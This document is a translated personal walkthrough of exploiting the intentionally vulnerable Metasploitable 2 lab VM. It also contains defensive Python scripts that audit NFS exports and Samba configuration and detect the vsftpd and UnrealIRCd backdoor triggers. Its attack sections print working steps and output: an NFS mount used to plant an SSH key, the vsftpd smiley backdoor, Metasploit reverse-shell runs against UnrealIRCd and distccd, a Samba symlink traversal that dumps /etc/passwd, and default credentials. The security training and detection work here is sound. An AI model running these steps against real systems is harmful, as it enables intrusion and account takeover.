Download
Metasploitable 2 download locations:
- https://information.rapid7.com/metasploitable-download.html
- https://sourceforge.net/projects/metasploitable/
0x01 Getting started
Username: msfadmin
Password: msfadmin
Use ifconfig to view the IP address; here the target's IP is 192.168.111.146.
About Kali: I use Kali inside Win10, and I need to install a lot of tools and libraries. I hope doing this write-up lets my WinKali end up with a complete tool set.
0x02 Services
When using the subsystem, Nmap does not work properly; from what I looked up, the problem is with the subsystem's sockets. To get around it, I ran it again in the Kali virtual machine.
The results below are from the Kali virtual machine.
Scanning with Nmap:
```
root@kali:~# nmap -p0-65535 192.168.111.146
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-18 12:59 CST
Nmap scan report for bogon (192.168.111.146)
Host is up (0.00013s latency).
Not shown: 65506 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
1099/tcp  open  rmiregistry
1524/tcp  open  ingreslock
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
3306/tcp  open  mysql
3632/tcp  open  distccd
5432/tcp  open  postgresql
5900/tcp  open  vnc
6000/tcp  open  X11
6667/tcp  open  irc
6697/tcp  open  ircs-u
8009/tcp  open  ajp13
8180/tcp  open  unknown
8787/tcp  open  msgsrvr
34609/tcp open  unknown
35752/tcp open  unknown
39086/tcp open  unknown
48560/tcp open  unknown
MAC Address: 00:0C:29:5A:C7:D5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.37 seconds
```
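As an added example (my own code, not from the guide or the original post), here is a small Python script that parses Nmap's normal-output format shown above and triages each open port against a hardening baseline: services that should never face an untrusted network are flagged with the reason, and ports Nmap could not identify are queued for a version scan. The scan text is a trimmed, constructed copy of the output above, and the baseline list is my own.

```python
import re

# Constructed sample: a trimmed copy of the nmap normal-output layout above
# (fewer lines than the real scan, same format).
SAMPLE_SCAN = """\
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-18 12:59 CST
Nmap scan report for bogon (192.168.111.146)
Host is up (0.00013s latency).
Not shown: 65506 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
111/tcp   open  rpcbind
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
1524/tcp  open  ingreslock
2049/tcp  open  nfs
3632/tcp  open  distccd
5900/tcp  open  vnc
6000/tcp  open  X11
8180/tcp  open  unknown
MAC Address: 00:0C:29:5A:C7:D5 (VMware)
"""

# Review baseline (my own list, not from the guide): services that should
# not be reachable from an untrusted network, with the reason to raise.
RISKY_SERVICES = {
    "ftp": "cleartext credentials; prefer SFTP or FTPS",
    "telnet": "cleartext login; replace with SSH",
    "exec": "r-service (rexec) trusts .rhosts; disable",
    "login": "r-service (rlogin) trusts .rhosts; disable",
    "shell": "r-service (rsh) trusts .rhosts; disable",
    "ingreslock": "well-known backdoor port; identify the listener",
    "nfs": "NFS reachable; review /etc/exports and firewall it",
    "distccd": "distcc accepts jobs from anyone; restrict with --allow",
    "vnc": "remote desktop exposed; tunnel or firewall",
    "X11": "X server listening on the network; disable TCP listening",
}

# "<port>/<proto>  <state>  <service>" lines of nmap normal output
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_open_ports(scan_text):
    """Return [(port, proto, service)] for every line whose state is 'open'."""
    ports = []
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            ports.append((int(m.group(1)), m.group(2), m.group(4)))
    return ports


def triage(scan_text):
    """Split open ports into flagged (known-risky service) and review (unidentified)."""
    flagged, review = [], []
    for port, proto, service in parse_open_ports(scan_text):
        if service in RISKY_SERVICES:
            flagged.append((port, service, RISKY_SERVICES[service]))
        elif service == "unknown":
            review.append((port, proto))
    return flagged, review


if __name__ == "__main__":
    flagged, review = triage(SAMPLE_SCAN)
    for port, service, why in flagged:
        print(f"{port:>5}/tcp {service:<11} {why}")
    for port, proto in review:
        print(f"{port:>5}/{proto} unidentified service, run a version scan (-sV)")
```

Run it against a real scan by reading the output file instead of `SAMPLE_SCAN`; everything Nmap labels `unknown` (8180, 34609 and friends above) is exactly what `-sV` is for.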
0x03 Unix basics
TCP ports 512, 513 and 514 are known as "r" services, and have been misconfigured to allow remote access from any host (the standard ".rhosts + +" condition). To take advantage of this, make sure the rsh-client package (on Ubuntu) is installed, and run the following command as the local root user. If you are prompted for an SSH key, the rsh-client tools have not been installed and Ubuntu is defaulting to SSH.
(Why can't I connect as root? Annoying.)
This is about as easy as it gets. The next service we should look at is the Network File System (NFS). NFS can be identified by probing port 2049 directly or by asking the port mapper for a list of services. In the example below, rpcinfo identifies NFS and showmount -e determines that the "/" share (the root of the file system) is being exported. You will need the rpcbind and nfs-common Ubuntu packages.
Need to install rpcbind and nfs-common:
```
root@kali:~# rpcinfo -p 192.168.111.146
   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  52576  status
    100024    1   tcp  34609  status
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100021    1   udp  41332  nlockmgr
    100021    3   udp  41332  nlockmgr
    100021    4   udp  41332  nlockmgr
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100021    1   tcp  39086  nlockmgr
    100021    3   tcp  39086  nlockmgr
    100021    4   tcp  39086  nlockmgr
    100005    1   udp  56322  mountd
    100005    1   tcp  48560  mountd
    100005    2   udp  56322  mountd
    100005    2   tcp  48560  mountd
    100005    3   udp  56322  mountd
    100005    3   tcp  48560  mountd
root@kali:~# showmount -e 192.168.111.146
Export list for 192.168.111.146:
/ *
```
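The `showmount -e` output above (the whole root filesystem exported to `*`) is exactly what an exports audit should catch before anyone else does. As an added example that is not part of the original post or the guide, the following Python parses an /etc/exports file and reports root exports, wildcard clients and `no_root_squash`. The exports text is a constructed sample, not the VM's actual file; its first line reproduces the condition showmount revealed.

```python
import re

# Constructed sample /etc/exports (not Metasploitable's real file). Line 1 is the
# condition showmount -e revealed above; the other lines are hardened forms.
SAMPLE_EXPORTS = """\
# constructed sample for the audit below
/                *(rw,no_root_squash)
/srv/share       192.168.111.0/24(ro,root_squash,sync)
/home/backup     backup.example.internal(rw,root_squash,sync)
"""

# exports(5) syntax after the path: one or more "client(opt,opt)" groups,
# or a bare client with no option list
CLIENT_RE = re.compile(r"(\S+?)\((.*?)\)|(\S+)")


def parse_exports(text):
    """Yield (path, client, set_of_options) for every export entry."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        path = parts[0]
        rest = parts[1] if len(parts) > 1 else "*"   # no client list means everyone
        for m in CLIENT_RE.finditer(rest):
            if m.group(1) is not None:
                yield path, m.group(1), set(m.group(2).split(","))
            else:
                # bare client: exports(5) defaults apply (ro, root_squash)
                yield path, m.group(3), set()


def audit_exports(text):
    """Return findings as (path, client, message); an empty list means nothing flagged."""
    findings = []
    for path, client, opts in parse_exports(text):
        if path == "/":
            findings.append((path, client, "root filesystem exported"))
        if client.startswith("*"):
            findings.append((path, client, "exported to any host (wildcard client)"))
        if "no_root_squash" in opts:
            findings.append((path, client, "no_root_squash: remote root keeps uid 0"))
        if "rw" in opts and "no_root_squash" in opts:
            findings.append((path, client,
                             "writable by remote root: any file, e.g. root's authorized_keys, can be replaced"))
    return findings


if __name__ == "__main__":
    for path, client, msg in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:<14} {client:<28} {msg}")
```

The fix for the flagged line is the usual one: export only the directory that needs sharing, to a specific network, read-only where possible, and never with `no_root_squash` unless a specific client genuinely needs it.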
Accessing a system via a writable file system like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on the attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file:
== This test did not succeed; I'm leaving the official steps here and will research it later ==
```
root@ubuntu:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
root@ubuntu:~# mkdir /tmp/r00t
root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/
root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
root@ubuntu:~# umount /tmp/r00t
root@ubuntu:~# ssh root@192.168.99.131
Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
root@metasploitable:~#
```
0x04 Backdoors
On port 21, Metasploitable 2 runs vsftpd, a popular FTP server. This particular version contains a backdoor that was inserted into the source code by an unknown intruder. The backdoor was quickly identified and removed, but not before many people had downloaded it. If the username sent ends with the sequence ":)" (a smiley face), the backdoored version opens a listening shell on port 6200. We can demonstrate this with telnet, or use the Metasploit Framework module to exploit it automatically:
My own steps were too messy, so I'll just use the official ones. Amazing.
```
root@ubuntu:~# telnet 192.168.99.131 21
Trying 192.168.99.131...
Connected to 192.168.99.131.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass invalid
^]
telnet> quit
Connection closed.
root@ubuntu:~# telnet 192.168.99.131 6200
Trying 192.168.99.131...
Connected to 192.168.99.131.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
```
On port 6667, Metasploitable 2 runs the UnrealIRCd IRC daemon. This version contains a backdoor that went unnoticed for months, triggered by sending the letters "AB" followed by a system command to the server on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.
CVE-2010-2075
```
root@kali:~# service postgresql start
root@kali:~# msfconsole
 # cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ metasploit v4.16.57-dev                          ]
+ -- --=[ 1769 exploits - 1007 auxiliary - 307 post       ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST 192.168.111.146
RHOST => 192.168.111.146
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.111.144:4444
[*] 192.168.111.146:6667 - Connected to 192.168.111.146:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] 192.168.111.146:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo P7qlbshau0cggxky;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "P7qlbshau0cggxky\r\n"
[*] Matching...
[*] B is input...
id
uid=0(root) gid=0(root)
```
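Both backdoors above have simple network signatures: the vsftpd 2.3.4 trigger is a USER argument ending in ":)", and the UnrealIRCd 3.2.8.1 trigger is a line that starts with "AB" followed by a command (the Metasploit module sends it as "AB;"). As an added example (not code from the original post, the guide or Metasploit), here is a small Python detector that applies those two signatures to sensor records and additionally flags any follow-up connection to port 6200 from a host that tripped the vsftpd signature. The `Event` records are constructed samples, not traffic from the lab.

```python
import re
from collections import namedtuple

# Constructed records in the shape a sensor might hand us: source address,
# destination port and one protocol command line. Not a capture from the lab above.
Event = namedtuple("Event", "src dst_port payload")
SAMPLE_EVENTS = [
    Event("10.0.0.5", 21, "USER alice"),
    Event("10.0.0.5", 21, "PASS secret"),
    Event("10.0.0.9", 21, "USER backdoored:)"),
    Event("10.0.0.9", 21, "PASS invalid"),
    Event("10.0.0.9", 6200, "id;"),
    Event("10.0.0.7", 6667, "NICK observer"),
    Event("10.0.0.7", 6667, "AB;echo test"),
]

# (rule name, destination port, pattern over the command line)
SIGNATURES = [
    # vsftpd 2.3.4 backdoor: USER argument ends with the smiley trigger
    ("vsftpd-234-backdoor-trigger", 21, re.compile(r"^USER\s+\S*:\)\s*$")),
    # UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075): line begins with "AB;"
    # (assumes the trigger arrives at the start of a line, as the module sends it)
    ("unrealircd-3281-backdoor-trigger", 6667, re.compile(r"^AB;")),
]

SHELL_PORT = 6200   # port the backdoored vsftpd listens on after the trigger


def match_events(events):
    """Return [(rule_name, src)] for every event matching a signature, plus
    a follow-up alert for traffic to the vsftpd shell port from a triggering host."""
    alerts = []
    for ev in events:
        for name, port, pattern in SIGNATURES:
            if ev.dst_port == port and pattern.search(ev.payload):
                alerts.append((name, ev.src))
    # second pass: did a host that sent the smiley then talk to port 6200?
    triggered = {src for name, src in alerts if name.startswith("vsftpd")}
    for ev in events:
        if ev.dst_port == SHELL_PORT and ev.src in triggered:
            alerts.append(("vsftpd-234-backdoor-shell-use", ev.src))
    return alerts


if __name__ == "__main__":
    for rule, src in match_events(SAMPLE_EVENTS):
        print(f"ALERT {rule:<34} from {src}")
```

The second pass is the useful part for incident response: the trigger alone might be a scanner probing for the backdoor, but a trigger followed by a session to 6200 from the same source means the shell actually opened. Either way, the real fix is to remove the trojaned package rather than to filter the trigger.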
Less subtle is the old-standby "ingreslock" backdoor listening on port 1524. Ten years ago, the ingreslock port was a popular choice for adding a backdoor to a compromised server. Accessing it is easy:
Scary: it drops you straight into root!!!!!
0x05 Unintentional backdoors
In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. The first of these installed on Metasploitable 2 is distccd. This program makes it easy to scale large compiler jobs across a farm of similarly configured systems. The problem with this service is that an attacker can easily abuse it to run commands of their choosing, as demonstrated by the Metasploit module below.
```
root@kali:~# msfconsole
[Metasploit ASCII-art banner with https://metasploit.com]

       =[ metasploit v4.16.57-dev                          ]
+ -- --=[ 1767 exploits - 1007 auxiliary - 307 post       ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/unix/misc/distcc_exec
msf exploit(unix/misc/distcc_exec) > set RHOST 192.168.111.146
RHOST => 192.168.111.146
msf exploit(unix/misc/distcc_exec) > exploit
[*] Started reverse TCP double handler on 192.168.111.144:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Rakautnjekolfqat;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Rakautnjekolfqat\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.111.144:4444 -> 192.168.111.146:46058) at 2018-07-18 14:11:34 +0800
whoami
daemon
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
```
This write-up makes me feel the world is less and less safe, and this was 10 years ago!
Samba, when configured with a writable file share and "wide links" enabled (which is the default), can also be used as a backdoor of sorts to access files that were not meant to be shared. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writable share.
```
msf > smbclient -L //192.168.111.146
[*] exec: smbclient -L //192.168.111.146
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            METASPLOITABLE
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(admin/smb/samba_symlink_traversal) > set RHOST 192.168.111.146
RHOST => 192.168.111.146
msf auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf auxiliary(admin/smb/samba_symlink_traversal) > exploit
[*] 192.168.111.146:445 - Connecting to the server...
[*] 192.168.111.146:445 - Trying to mount writeable share 'tmp'...
[*] 192.168.111.146:445 - Trying to link 'rootfs' to the root filesystem...
[*] 192.168.111.146:445 - Now access the following share to browse the root filesystem:
[*] 192.168.111.146:445 -     \\192.168.111.146\tmp\rootfs\
[*] Auxiliary module execution completed
msf auxiliary(admin/smb/samba_symlink_traversal) > smbclient //192.168.111.146/tmp
[*] exec: smbclient //192.168.111.146/tmp
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> cd
Current directory is \
smb: \> cd rootfs
smb: \rootfs\> ls
  .                                   DR        0  Mon May 21 02:36:12 2012
  ..                                  DR        0  Mon May 21 02:36:12 2012
  [... remaining entries: initrd, media, lost+found, mnt, sbin, initrd.img, home, lib,
       usr, proc, root, sys, boot, nohup.out, etc, dev, vmlinuz, opt, var, cdrom, tmp, srv ...]

                7282168 blocks of size 1024. 5428700 blocks available
smb: \rootfs\> cd etc
smb: \rootfs\etc\> more passwd
getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.oZUiCn (528.6 KiloBytes/sec) (average 528.6 KiloBytes/sec)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
```
Surprise!!!
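The Samba finding above comes down to three settings on one share: it is writable, it is reachable anonymously, and `wide links` is left at the Samba 3.0-era default of yes. As an added example (my own code, not the VM's configuration or anything from the guide), the following Python parses an smb.conf and flags shares that combine those settings. The configuration text is a constructed sample whose `[tmp]` share mirrors what smbclient showed. Treating a missing `wide links` parameter as "yes" is an assumption that matches the Samba version discussed here; current Samba releases default it to no.

```python
# Constructed sample smb.conf (not the file from the VM). The [tmp] share mirrors
# what smbclient showed above: writable, guest-accessible, with wide links on.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = metasploitable server
   wide links = yes

[tmp]
   comment = oh noes!
   path = /tmp
   read only = no
   guest ok = yes

[opt]
   path = /opt
   read only = yes
   guest ok = yes

[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
"""


def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {param: value}}; comments start with # or ;."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def _truthy(value, default):
    """Samba booleans: yes/true/1 (case-insensitive); None means parameter not set."""
    if value is None:
        return default
    return value.strip().lower() in ("yes", "true", "1")


def audit_smb_conf(text):
    """Return [(share, message)] for shares that are writable and anonymous, and for
    writable shares served while wide links are enabled."""
    conf = parse_smb_conf(text)
    g = conf.get("global", {})
    # Assumption: absent 'wide links' means yes, as in Samba 3.0.x (newer Samba: no)
    wide_links = _truthy(g.get("wide links"), default=True)
    findings = []
    for share, params in conf.items():
        if share in ("global", "homes", "printers"):
            continue
        # 'read only = no' or 'writable/writeable = yes' both make a share writable
        writable = (not _truthy(params.get("read only"), default=True)
                    or _truthy(params.get("writable", params.get("writeable")), default=False))
        guest = _truthy(params.get("guest ok", params.get("public")), default=False)
        if writable and guest:
            findings.append((share, "writable by anonymous users"))
        if writable and wide_links:
            findings.append((share, "writable share with wide links: a symlink created in the "
                                    "share can point outside it (e.g. to /)"))
    return findings


if __name__ == "__main__":
    for share, msg in audit_smb_conf(SAMPLE_SMB_CONF):
        print(f"[{share}] {msg}")
```

Setting `wide links = no` in `[global]` makes the second finding disappear, which the test below checks; the anonymous-write finding stays until `guest ok` is turned off or the share is made read-only.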
0x06 Weak passwords
In addition to the more blatant backdoors and misconfigurations, Metasploitable 2 has terrible password security for both system and database server accounts. The primary administrative user, msfadmin, has a password matching the username. By discovering the list of users on this system, either by using another flaw to capture the passwd file or by enumerating these user IDs via Samba, a brute-force attack can be used to quickly access multiple user accounts. At a minimum, the following weak system accounts are configured on the system.
| User     | Password  |
|----------|-----------|
| msfadmin | msfadmin  |
| user     | user      |
| postgres | postgres  |
| sys      | batman    |
| klog     | 123456789 |
| service  | service   |
In addition to these system-level accounts, the PostgreSQL service can be accessed with the username postgres and password postgres, while the MySQL service is open with the username root and a blank password. The VNC service provides remote desktop access using the password password.
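Two findings above go together: the /etc/passwd dump in the Samba section tells you which accounts have an interactive shell, and the credential table tells you which of them have guessable passwords. As an added example (not part of the original post), this Python joins the two: it parses passwd entries (a constructed excerpt in the same format as the dump), lists the accounts with a login shell, and annotates each weak-credential account with whether its password equals its username and whether its shell permits login. /etc/passwd alone cannot say whether a password is locked; that needs /etc/shadow, which this script deliberately does not read.

```python
# Constructed excerpt of /etc/passwd in the same format as the dump above
# (a subset of the real file, not a copy of it).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
"""

# The weak-credential table from section 0x06
WEAK_CREDENTIALS = {
    "msfadmin": "msfadmin",
    "user": "user",
    "postgres": "postgres",
    "sys": "batman",
    "klog": "123456789",
    "service": "service",
}

# Shells that refuse an interactive login
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}


def parse_passwd(text):
    """Return {username: {uid, gid, home, shell}} from passwd(5) lines."""
    accounts = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":", 6)
        accounts[name] = {"uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return accounts


def interactive_accounts(accounts):
    """Usernames whose shell permits login, sorted. Note: a locked password hash in
    /etc/shadow would still block them; passwd alone cannot show that."""
    return sorted(name for name, a in accounts.items() if a["shell"] not in NOLOGIN_SHELLS)


def audit_weak_credentials(accounts, weak):
    """For each weak-credential account present in passwd, list what makes it risky."""
    findings = []
    for name, password in weak.items():
        if name not in accounts:
            continue
        a = accounts[name]
        reasons = []
        if password == name:
            reasons.append("password equals username")
        if a["uid"] == 0:
            reasons.append("uid 0")
        if a["shell"] in NOLOGIN_SHELLS:
            reasons.append(f"no login shell ({a['shell']}); blocks shell login only")
        else:
            reasons.append(f"interactive shell {a['shell']}")
        findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    accounts = parse_passwd(SAMPLE_PASSWD)
    print("interactive:", ", ".join(interactive_accounts(accounts)))
    for name, reasons in audit_weak_credentials(accounts, WEAK_CREDENTIALS):
        print(f"{name:<10} {'; '.join(reasons)}")
```

The split matters for prioritising fixes: msfadmin, user, postgres, sys and service can log in over SSH with those passwords, whereas klog's `/bin/false` shell stops an interactive login even though its password is just as weak.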
0x07 Vulnerable web services
Metasploitable 2 comes with several intentionally vulnerable web applications pre-installed. When Metasploitable 2 boots, the web server starts automatically. To access the web applications, open a web browser and enter the URL http://<IP>/, where <IP> is the address of Metasploitable 2.
(Borrowing a picture here; the screenshot is not reproduced.)
A point worth knowing:
192.168.56.0/24 is the default "host-only" network in VirtualBox. IP addresses are assigned starting from 101. Depending on the boot order of the guest operating systems, the IP address of Metasploitable 2 will vary.
To access a particular web application, click one of the links provided. Each application can also be reached directly by appending its directory name to http://<IP>/:
- TWiki
- phpMyAdmin
- Mutillidae
- DVWA
- WebDAV
0x08 Mutillidae
The Mutillidae web application (NOWASP (Mutillidae)) contains all of the vulnerabilities from the OWASP Top Ten plus a number of others, such as HTML5 web storage, form caching, and clickjacking. Inspired by DVWA, Mutillidae allows the user to change the "security level" from 0 (completely insecure) to 5 (secure). In addition, there are three levels of hints, ranging from "Level 0 - I try harder" (no hints) to "Level 2 - noob" (maximum hints). If the application is damaged by user injections and hacks, clicking the "Reset DB" button resets the application to its original state.
This application contains plenty of holes, enough for everyone to learn from...
Learning makes me happy!!!
0x09 DVWA
From the DVWA homepage: "Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a classroom environment."
This environment can also be built on your own.
User: admin
Pass: password
0x0A Information disclosure
In addition, an ill-advised PHP information disclosure page can be found at the following location: http://
Reference documents
(My English is not good; this relied mostly on Google Translate.)
- Metasploitable 2 Exploitability Guide (official documentation)
- About the Metasploitable test